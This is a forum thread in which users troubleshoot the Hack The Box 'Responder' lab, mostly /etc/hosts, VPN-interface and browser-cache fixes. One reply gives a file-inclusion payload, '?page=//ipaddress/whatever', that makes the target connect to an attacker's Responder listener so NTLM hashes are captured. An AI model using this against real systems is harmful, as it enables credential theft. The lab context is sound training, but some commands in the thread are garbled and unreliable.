in the RESPONDER challenge , the unika.htb is not responding , even after adding it to /etc/hosts what might be the issue ?
I had the same issue until I realized I had to put my ip (found with ifconfig on the interface tun0 or whatever interface you have for openvpn) in the url. I suggest you to watch the walkthrough carefully if you have any issue, they literally write anything you need to know.
In my case I had to delete browser’s cache…
For anyone else who may be stuck troubleshooting. Here are some options to try, I was stuck too. Read through all 3, you may have missed one.
A (yes I had to append one haha). If you put in the ip address into the browser and it wont let you see the unika.htb, you need to resolv the /etc/hosts file for the DNS server because the server is a server running HTB VM boxes, and they all share the same outgoing IP, so the domain name doesn’t know what ip to attach to.
go into > cd /etc/hosts and add the ‘IPADDRESS (tab space) unika.htb’, aparently you will have to do this over and over for htb boxes when its a web server to view the page for more enumeration…I just wanted to use the word enumeration to sound smart.
1 Make sure the interface you use when you start Responder is the interface that is connected to the HTB box. For me it was openvpn, so tun0.
2 Also make sure you are connected to the HTB box in the same environment you are running Responder, I was using tools in my Kali VM, but running the openvpn connection on my mac, so couldn’t read the traffic.
3 Once responder is up and running properly ‘python3 -I tun0’, then make sure when you enter the web browser address to add smb payload ‘http://unika.htb/?page=//ipaddress/whatever’, the IPADDRESS is NOT the Responder HTB server you used to nmap earlier, its the ipaddress connected to our openvpn connection!. You can check this with ifconfig in kali or linux, and see what tun0 ip is or JUST GO into the running responder listening and look at the responder IP address after the responder NIC line of code…make sure you use that in the web address attack with page= :).
Hope this helps.
Had the same issue ,
if Your Responder is listening for events & not catching anything , then
i had to disable the firewall for Responder to catch the hashes
in my case
sudo systemctl stop ufw
for me, i took out the echo and unpiped the two commands. then cleared cache and it went smoothly
I realize this post is a year old but thought I should give my update incase anyone else is having issues.
Unfortunately, None of this worked for me.
I ran ifconfig to find my local on turn0
used that under this command
echo “turn0 _ip unika.htb” | sudo tee -a /etc/hosts
echo “machineIP unika.htb” | sudo tee -a /etc/hosts
Cleared cache
Reloaded page and it worked.
this was all through their HTB VM